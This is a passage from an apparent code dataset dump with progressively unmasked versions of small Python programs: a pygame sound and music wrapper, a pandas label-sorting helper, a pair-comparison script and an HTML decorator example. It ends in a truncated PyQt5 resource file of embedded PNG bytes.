"step-2": "<mask token>\n\n\nclass Music(object):\n <mask token>\n <mask token>\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=-1):\n self.sound.set_volume(Music.our_music_volume)\n self.channel = self.sound.play(loop)\n Music.our_current_music = self.sound\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n <mask token>\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Music.our_music_volume = volume\n if Music.our_current_music is not None:\n Music.our_current_music.set_volume(volume)\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n\n\nclass Sound(object):\n our_sound_volume = 0.8\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=0):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume(Sound.our_sound_volume)\n self.channel = self.sound.play(loop)\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n",
"step-3": "<mask token>\n\n\ndef deinit():\n mixer.quit()\n\n\nclass Music(object):\n our_music_volume = 0.8\n our_current_music = None\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=-1):\n self.sound.set_volume(Music.our_music_volume)\n self.channel = self.sound.play(loop)\n Music.our_current_music = self.sound\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Music.our_music_volume = volume\n if Music.our_current_music is not None:\n Music.our_current_music.set_volume(volume)\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n\n\nclass Sound(object):\n our_sound_volume = 0.8\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=0):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume(Sound.our_sound_volume)\n self.channel = self.sound.play(loop)\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n",
"step-4": "import pygame\nimport pygame.mixer as mixer\n\n\ndef pre_init():\n mixer.pre_init(22050, -16, 2, 2048)\n\n\ndef init():\n mixer.init()\n pygame.mixer.set_num_channels(16)\n\n\ndef deinit():\n mixer.quit()\n\n\nclass Music(object):\n our_music_volume = 0.8\n our_current_music = None\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=-1):\n self.sound.set_volume(Music.our_music_volume)\n self.channel = self.sound.play(loop)\n Music.our_current_music = self.sound\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Music.our_music_volume = volume\n if Music.our_current_music is not None:\n Music.our_current_music.set_volume(volume)\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n\n\nclass Sound(object):\n our_sound_volume = 0.8\n\n def __init__(self, filename=None):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load(filename)\n\n def load(self, filename):\n self.sound = mixer.Sound(filename)\n\n def play(self, loop=0):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume(Sound.our_sound_volume)\n self.channel = self.sound.play(loop)\n\n def stop(self):\n self.sound.stop()\n\n def fadeout(self, millisec):\n self.sound.fadeout(millisec)\n\n def is_playing(self):\n return self.channel is not None and self.channel.get_sound(\n ) is self.sound\n\n @staticmethod\n def set_global_volume(volume):\n assert volume >= 0.0\n assert volume <= 1.0\n Sound.our_sound_volume = volume\n\n @staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n",
"step-5": "#!/usr/bin/env python\n\nimport pygame\nimport pygame.mixer as mixer\n\ndef pre_init():\n mixer.pre_init(22050, -16, 2, 2048)\n\ndef init():\n mixer.init()\n pygame.mixer.set_num_channels(16)\n\ndef deinit():\n mixer.quit()\n\n\nclass Music (object):\n our_music_volume = 0.8\n our_current_music = None\n \n def __init__( self, filename = None ):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load( filename )\n\n def load( self, filename ):\n self.sound = mixer.Sound( filename )\n\n def play( self, loop = -1 ):\n self.sound.set_volume( Music.our_music_volume )\n self.channel = self.sound.play( loop )\n Music.our_current_music = self.sound\n \n def stop( self ):\n self.sound.stop()\n\n def fadeout( self, millisec ):\n self.sound.fadeout( millisec )\n\n def is_playing( self ):\n return self.channel is not None and self.channel.get_sound() is self.sound\n\n @staticmethod\n def set_global_volume( volume ):\n assert volume >= 0.0\n assert volume <= 1.0\n\n Music.our_music_volume = volume\n\n if Music.our_current_music is not None:\n Music.our_current_music.set_volume( volume )\n\n @staticmethod\n def get_global_volume():\n return Music.our_music_volume\n \n\nclass Sound (object):\n our_sound_volume = 0.8\n \n def __init__( self, filename = None ):\n self.sound = None\n self.channel = None\n if filename is not None:\n self.load( filename )\n\n def load( self, filename ):\n self.sound = mixer.Sound( filename )\n\n def play( self, loop = 0 ):\n \"\"\"for infiniteloop, set loop to -1\"\"\"\n self.sound.set_volume( Sound.our_sound_volume )\n self.channel = self.sound.play( loop )\n \n def stop( self ):\n self.sound.stop()\n\n def fadeout( self, millisec ):\n self.sound.fadeout( millisec )\n\n def is_playing( self ):\n return self.channel is not None and self.channel.get_sound() is self.sound\n\n @staticmethod\n def set_global_volume( volume ):\n assert volume >= 0.0\n assert volume <= 1.0\n\n Sound.our_sound_volume = volume\n\n 
@staticmethod\n def get_global_volume():\n return Sound.our_sound_volume\n \n",
"step-ids": [
12,
18,
21,
24,
25
]
}
|
[
12,
18,
21,
24,
25
] |
import pandas as pd
import numpy as np
class LabeledArray:
@staticmethod
def get_label_for_indexes_upto(input_data, input_label, input_index):
df_input_data = pd.DataFrame(input_data)
df_labels = pd.DataFrame(input_label)
df_data_labels = pd.concat([df_input_data, df_labels], axis=1)
df_data_labels.columns = ['input_data', 'input_label']
df_data_labels.sort_values(by=['input_data'], ascending=True,
inplace=True)
return np.array(df_data_labels.iloc[:, 1].head(input_index))
|
normal
|
{
"blob_id": "0dea8675d8050a91c284a13bcbce6fd0943b604e",
"index": 5135,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LabeledArray:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LabeledArray:\n\n @staticmethod\n def get_label_for_indexes_upto(input_data, input_label, input_index):\n df_input_data = pd.DataFrame(input_data)\n df_labels = pd.DataFrame(input_label)\n df_data_labels = pd.concat([df_input_data, df_labels], axis=1)\n df_data_labels.columns = ['input_data', 'input_label']\n df_data_labels.sort_values(by=['input_data'], ascending=True,\n inplace=True)\n return np.array(df_data_labels.iloc[:, 1].head(input_index))\n",
"step-4": "import pandas as pd\nimport numpy as np\n\n\nclass LabeledArray:\n\n @staticmethod\n def get_label_for_indexes_upto(input_data, input_label, input_index):\n df_input_data = pd.DataFrame(input_data)\n df_labels = pd.DataFrame(input_label)\n df_data_labels = pd.concat([df_input_data, df_labels], axis=1)\n df_data_labels.columns = ['input_data', 'input_label']\n df_data_labels.sort_values(by=['input_data'], ascending=True,\n inplace=True)\n return np.array(df_data_labels.iloc[:, 1].head(input_index))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def is_huge(A, B):
return A[0] > B[0] and A[1] > B[1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def is_huge(A, B):
return A[0] > B[0] and A[1] > B[1]
if __name__ == '__main__':
bulks = []
num = int(sys.stdin.readline())
for i in range(num):
bulks.append(list(map(int, sys.stdin.readline().split())))
for i in range(len(bulks)):
count = 0
for j in range(len(bulks)):
if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):
count += 1
if count == 0:
print(1, end=' ')
else:
print(count + 1, end=' ')
<|reserved_special_token_1|>
import sys
def is_huge(A, B):
return A[0] > B[0] and A[1] > B[1]
if __name__ == '__main__':
bulks = []
num = int(sys.stdin.readline())
for i in range(num):
bulks.append(list(map(int, sys.stdin.readline().split())))
for i in range(len(bulks)):
count = 0
for j in range(len(bulks)):
if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):
count += 1
if count == 0:
print(1, end=' ')
else:
print(count + 1, end=' ')
<|reserved_special_token_1|>
import sys
def is_huge(A, B):
return (A[0] > B[0]) and (A[1] > B[1])
if __name__ == '__main__':
bulks = []
num = int(sys.stdin.readline())
for i in range(num):
bulks.append(list(map(int, sys.stdin.readline().split())))
for i in range(len(bulks)):
count = 0
for j in range(len(bulks)):
if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):
count += 1
if count == 0:
print(1, end=" ")
else:
print(count+1, end=" ")
|
flexible
|
{
"blob_id": "5dc8f420e16ee14ecfdc61413f10a783e819ec32",
"index": 506,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef is_huge(A, B):\n return A[0] > B[0] and A[1] > B[1]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef is_huge(A, B):\n return A[0] > B[0] and A[1] > B[1]\n\n\nif __name__ == '__main__':\n bulks = []\n num = int(sys.stdin.readline())\n for i in range(num):\n bulks.append(list(map(int, sys.stdin.readline().split())))\n for i in range(len(bulks)):\n count = 0\n for j in range(len(bulks)):\n if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):\n count += 1\n if count == 0:\n print(1, end=' ')\n else:\n print(count + 1, end=' ')\n",
"step-4": "import sys\n\n\ndef is_huge(A, B):\n return A[0] > B[0] and A[1] > B[1]\n\n\nif __name__ == '__main__':\n bulks = []\n num = int(sys.stdin.readline())\n for i in range(num):\n bulks.append(list(map(int, sys.stdin.readline().split())))\n for i in range(len(bulks)):\n count = 0\n for j in range(len(bulks)):\n if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):\n count += 1\n if count == 0:\n print(1, end=' ')\n else:\n print(count + 1, end=' ')\n",
"step-5": "import sys\n\n\ndef is_huge(A, B):\n return (A[0] > B[0]) and (A[1] > B[1])\n\n\nif __name__ == '__main__':\n bulks = []\n num = int(sys.stdin.readline())\n for i in range(num):\n bulks.append(list(map(int, sys.stdin.readline().split())))\n\n for i in range(len(bulks)):\n count = 0\n for j in range(len(bulks)):\n if bulks[i] != bulks[j] and is_huge(bulks[j], bulks[i]):\n count += 1\n\n if count == 0:\n print(1, end=\" \")\n else:\n print(count+1, end=\" \")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@h1_wrap
def say_hi(name):
return 'Hello, ' + name.capitalize()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def h1_wrap(func):
def func_wrapper(param):
return '<h1>' + func(param) + '</h1>'
return func_wrapper
@h1_wrap
def say_hi(name):
return 'Hello, ' + name.capitalize()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def h1_wrap(func):
def func_wrapper(param):
return '<h1>' + func(param) + '</h1>'
return func_wrapper
@h1_wrap
def say_hi(name):
return 'Hello, ' + name.capitalize()
print(say_hi('Stephan'))
<|reserved_special_token_1|>
def h1_wrap(func):
def func_wrapper(param):
return "<h1>"+func(param) + "</h1>"
return func_wrapper
@h1_wrap
def say_hi(name):
return "Hello, " + name.capitalize()
print(say_hi("Stephan"))
|
flexible
|
{
"blob_id": "9c9005acb40e4b89ca215345361e21f08f984847",
"index": 5735,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@h1_wrap\ndef say_hi(name):\n return 'Hello, ' + name.capitalize()\n\n\n<mask token>\n",
"step-3": "def h1_wrap(func):\n\n def func_wrapper(param):\n return '<h1>' + func(param) + '</h1>'\n return func_wrapper\n\n\n@h1_wrap\ndef say_hi(name):\n return 'Hello, ' + name.capitalize()\n\n\n<mask token>\n",
"step-4": "def h1_wrap(func):\n\n def func_wrapper(param):\n return '<h1>' + func(param) + '</h1>'\n return func_wrapper\n\n\n@h1_wrap\ndef say_hi(name):\n return 'Hello, ' + name.capitalize()\n\n\nprint(say_hi('Stephan'))\n",
"step-5": "def h1_wrap(func):\n def func_wrapper(param):\n return \"<h1>\"+func(param) + \"</h1>\"\n return func_wrapper\n\n\n@h1_wrap\ndef say_hi(name):\n return \"Hello, \" + name.capitalize()\n\n\nprint(say_hi(\"Stephan\"))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.0)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x01\xde\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x28\x00\x00\x00\x28\x08\x06\x00\x00\x00\x8c\xfe\xb8\x6d\
\x00\x00\x01\xa5\x49\x44\x41\x54\x78\x9c\xed\xd8\x3f\x6b\x14\x41\
\x1c\x87\xf1\x4f\x42\x2c\x8d\x45\x88\x58\x0b\x22\x24\x20\xa4\xb0\
\x49\xa3\x28\x8a\x08\xfe\x69\x24\x4d\xf0\xcc\xeb\x4a\x61\x52\xa8\
\x2f\xc1\xca\x22\x20\x36\x82\x58\x59\x58\x08\x2a\x68\xa2\x44\xc5\
\x34\x81\xa8\x9b\x62\x38\x18\xe6\x76\x6f\x2f\x97\x9d\x35\x1c\xfb\
\xc0\xc0\xdd\xcc\xee\xcd\xb3\xbf\xd9\xfd\xde\xdc\xd1\xd1\x71\x32\
\xb8\x8f\xef\x28\x8e\xd8\xbe\xe2\x56\x1b\x82\xdb\xb8\x3c\xc6\x79\
\x37\xf0\xbe\x61\x97\x52\x8a\x31\xcf\x3b\x83\x5f\x4d\x8a\xa4\x4c\
\xe7\xfc\xf0\x26\x98\x78\xc1\x7d\xfc\x73\xf4\x87\x2b\x6e\xdf\x70\
\xb7\x6e\xa2\x71\xef\xc1\x26\x58\xc6\xa7\xba\x83\xfe\xa7\xe0\xd0\
\xf9\x27\xfe\x1e\xcc\xce\x44\x08\xae\x0a\x61\x7c\x9c\x27\xb5\xae\
\x89\x5e\x1f\x60\x3d\x95\xa8\xba\x49\x67\xf1\x03\x0b\x23\x5c\x48\
\x53\x9c\xc3\xef\xfe\x9b\xba\x0a\xae\xe0\x05\xde\xe5\x34\x4a\xb8\
\x87\xe7\x69\x67\x55\x05\x5f\xe2\x4e\x56\x9d\x41\x5e\xe1\x76\xda\
\x59\x26\x78\x41\xd8\x4e\xcd\xe4\x36\x8a\xb8\x88\x2f\xf1\x9c\xc3\
\x96\xf8\x21\x9e\xe2\x4f\x66\xa9\x98\x1e\x9e\x94\xcd\x99\x56\x70\
\x1a\x1f\x71\xa9\x05\xa9\x78\xce\xcf\x58\x2c\x1b\x4c\x05\xaf\xe1\
\x4d\x6e\xa3\x84\x9b\x78\x9d\x76\x56\x2d\xf1\x1a\x1e\x67\xd5\x19\
\xa4\x87\x8d\xaa\xc1\xb8\x82\xa7\x85\xec\x9b\xcf\x2c\x14\x33\x8b\
\x9f\x98\x4b\x07\xca\x2a\xf8\x00\x5b\xc2\x8f\xa8\xb6\xe8\xe7\xed\
\x6e\xd5\x01\x71\x05\xb7\x84\xb0\x6c\x93\xda\xbc\xed\x0b\x9e\xc7\
\x0e\x4e\xe5\x36\x8a\x18\x9a\xb7\xe9\x12\xf7\xf0\x4c\xf8\xc2\x6e\
\x8b\x91\xf2\xb6\xc0\x14\x3e\x60\xa9\x05\xa9\x3e\x23\xe7\x6d\x81\
\xab\x78\x9b\x59\x28\xe5\xba\x9a\xbc\x8d\x97\xb8\x87\xcd\xac\x3a\
\x83\x3c\x32\x62\xde\x16\x42\xf6\x9d\xcd\x69\x13\x31\x25\xfc\xa7\
\xb3\xa3\x24\xfb\xca\xd8\x93\x77\xc7\x9c\xb6\xbf\xc2\x1e\xf3\xca\
\x31\x2f\xb4\xa3\xa3\xe3\xc4\x73\x08\x28\x98\x98\x24\xc8\xdd\xa5\
\x40\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x03\xab\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x10\x00\x00\x00\x10\x08\x03\x00\x00\x00\x28\x2d\x0f\x53\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x84\
\x50\x4c\x54\x45\x32\x37\x39\x00\x00\x00\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\
\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\
\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\xff\xff\xff\xeb\x7d\xd9\x30\x00\x00\x00\x2a\
\x74\x52\x4e\x53\x00\x00\x2c\xcf\xb7\x01\x18\x20\x1f\x1c\x15\xbd\
\x78\xc3\xc1\x77\x27\x31\x95\xbe\x2d\xdf\x50\x22\x1e\xca\xdc\x24\
\xc2\x28\x26\x32\x1d\x11\xb9\x4d\xf4\x12\xde\x4f\x88\xe0\xc4\x83\
\x03\xa2\x00\x00\x00\x01\x62\x4b\x47\x44\x2b\x24\xb9\xe4\x08\x00\
\x00\x00\x07\x74\x49\x4d\x45\x07\xe4\x09\x04\x02\x0c\x2c\x5e\x9a\
\xf1\x93\x00\x00\x00\x89\x49\x44\x41\x54\x18\xd3\x55\xcf\xd9\x12\
\x82\x30\x10\x44\xd1\x8e\x18\x88\xc8\xb0\xb8\x05\x01\x41\x41\x41\
\xf3\xff\x1f\x68\x36\x04\xef\x5b\x9f\xaa\xa9\x4a\x80\x75\x9b\x60\
\x0b\x1e\x46\xc2\x16\xed\x78\xbc\x57\x01\x12\x4a\x5d\x94\xe5\xc5\
\xe1\x78\xc2\xf9\x22\xa4\xad\x2c\xe8\x5a\xc4\x40\x25\xfc\x7d\xdd\
\x28\xba\x71\x0d\x12\x8c\xe9\xdd\x36\xaa\xe9\xb2\xbb\x03\xb7\xa9\
\x2e\x29\x9a\xc1\xec\x16\x32\x9d\xe1\xd1\x9b\xbd\x82\xe1\xd9\xeb\
\xbd\x82\x7c\x78\xe1\x0f\x6c\x6c\x01\x9f\x07\xb1\xfc\x4d\x18\x18\
\x27\xff\x74\x29\xc5\x44\x21\xf0\x1e\xab\x5f\x9f\x84\xe3\x0b\x50\
\xe9\x0c\xb4\xd8\x75\xd4\x0e\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x32\x30\x2d\
\x30\x37\x2d\x31\x39\x54\x30\x33\x3a\x33\x39\x3a\x32\x30\x2b\x30\
\x30\x3a\x30\x30\x86\x67\x0e\x5c\x00\x00\x00\x25\x74\x45\x58\x74\
\x64\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x31\x39\
\x2d\x30\x31\x2d\x30\x38\x54\x31\x39\x3a\x34\x39\x3a\x34\x36\x2b\
\x30\x30\x3a\x30\x30\xb0\x72\x32\xb2\x00\x00\x00\x20\x74\x45\x58\
\x74\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x68\x74\x74\x70\x73\x3a\
\x2f\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\x2e\x6f\x72\
\x67\xbc\xcf\x1d\x9d\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\
\x6d\x62\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\x50\x61\
\x67\x65\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x19\x74\x45\x58\
\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x48\
\x65\x69\x67\x68\x74\x00\x31\x30\x36\x38\x8a\xfc\x51\x92\x00\x00\
\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\
\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\x00\x31\x30\x36\x38\x9f\xb5\
\x8d\x8b\x00\x00\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\
\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\
\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x34\x36\
\x39\x37\x36\x39\x38\x36\x42\x37\xbe\xd0\x00\x00\x00\x12\x74\x45\
\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x31\x38\
\x32\x33\x37\x42\x1b\x5d\x79\xed\x00\x00\x00\x5a\x74\x45\x58\x74\
\x54\x68\x75\x6d\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\
\x2f\x2f\x2f\x64\x61\x74\x61\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\
\x77\x77\x77\x2e\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x6e\x65\x74\
\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\x65\x61\x73\x79\x69\x63\x6f\
\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\x73\x2f\x31\x31\x39\x2f\x31\
\x31\x39\x30\x37\x31\x30\x2e\x70\x6e\x67\x5a\xd1\x76\x4b\x00\x00\
\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x07\x27\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x03\x00\x00\x00\xd7\xa9\xcd\xca\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x02\x01\
\x50\x4c\x54\x45\x00\x00\x00\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\
\x88\x84\x8f\x8d\x8a\x94\x85\x81\x8c\x85\x82\x8c\x8a\x87\x91\x8c\
\x89\x92\xab\xaa\xb0\x8f\x8c\x96\x8e\x8b\x95\x8e\x8b\x94\x90\x8e\
\x97\x8b\x87\x92\x9a\x98\xa1\x98\x96\x9e\x8e\x8c\x95\x86\x83\x8e\
\xae\xad\xb3\xae\xad\xb3\xaa\xa9\xaf\x90\x8d\x97\x8b\x88\x92\x8c\
\x89\x93\xae\xad\xb3\xae\xad\xb3\xaa\xa9\xaf\x90\x8d\x96\x8b\x88\
\x92\x8b\x89\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\x8b\x88\x92\x8d\x8a\x93\x8c\x89\x93\xae\xad\xb3\xae\xad\xb3\xae\
\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x93\x91\
\x9a\x8c\x89\x93\x8b\x88\x92\x8b\x89\x92\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\x8b\
\x88\x92\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x8c\x89\x93\xae\xad\
\xb3\xae\xad\xb3\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\xaa\xa9\xaf\
\x8f\x8d\x96\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\xae\xad\xb3\xae\
\xad\xb3\xab\xaa\xb0\x8f\x8c\x96\x8b\x88\x92\x8b\x88\x92\x8f\x8c\
\x96\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\x8c\
\x89\x93\x8c\x89\x93\x8c\x89\x93\xae\xad\xb3\x8b\x88\x92\x8b\x88\
\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\x8c\x89\x93\
\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\x8c\
\x89\x93\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\
\xb3\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\x8b\
\x88\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\
\xb3\xab\xaa\xb0\x8f\x8c\x96\x8b\x88\x92\x8e\x8c\x95\xae\xad\xb3\
\xaa\xa9\xaf\x8f\x8d\x96\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\x8b\
\x88\x92\x8c\x8a\x93\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\xae\xad\
\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\
\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\
\x88\x92\x8f\x8c\x95\x8c\x89\x93\x8b\x88\x92\x8b\x88\x92\xae\xad\
\xb3\xae\xad\xb3\x8b\x89\x92\x8c\x89\x93\x8c\x89\x93\xae\xad\xb3\
\x90\x8d\x96\x8b\x88\x92\xaa\xa9\xaf\x90\x8d\x96\x8b\x88\x92\xae\
\xad\xb3\x00\x00\x00\xb1\xc2\x75\x92\x00\x00\x00\xa6\x74\x52\x4e\
\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x03\x13\x15\x15\x14\x06\x2a\xc2\xcf\xcf\xce\
\x49\x18\x14\x45\xfb\x6f\x07\x14\x23\xbc\xb9\x2b\x6b\xfe\x91\x02\
\x12\xbf\x2a\xbe\xd5\xa9\xe8\xee\xa7\xb8\xc7\x11\xb8\xc6\x1e\x08\
\x94\xc0\x19\xba\xf4\xf4\xdb\x31\xa1\xdf\x79\x3d\x3c\x75\xb5\x03\
\x05\x41\x65\x86\xeb\x3d\x36\xd9\xed\x71\x47\x2b\x04\xca\x6e\xfb\
\xc3\x13\xce\xf4\x34\xf0\xd0\x15\xcf\x3b\x33\xef\xcf\xc5\xfd\x74\
\x69\xfe\x04\x30\x4e\xea\xdb\x35\x2f\xd5\xf2\x96\x4b\xab\xd9\x6d\
\x33\x33\xb1\x05\x25\xf0\xef\xc1\x17\xb1\x9a\x0a\x1a\xc3\xc8\x29\
\xc6\xc4\xad\xef\xb7\xd7\xc1\x9f\x02\x8a\x7c\x04\x2c\xba\xcc\x17\
\x0b\x51\x16\x21\xcc\x15\x04\x0d\xb7\x9c\xe1\x00\x00\x00\x01\x62\
\x4b\x47\x44\x00\x88\x05\x1d\x48\x00\x00\x00\x09\x70\x48\x59\x73\
\x00\x00\x00\x64\x00\x00\x00\x64\x00\x0f\x96\xc5\xdd\x00\x00\x00\
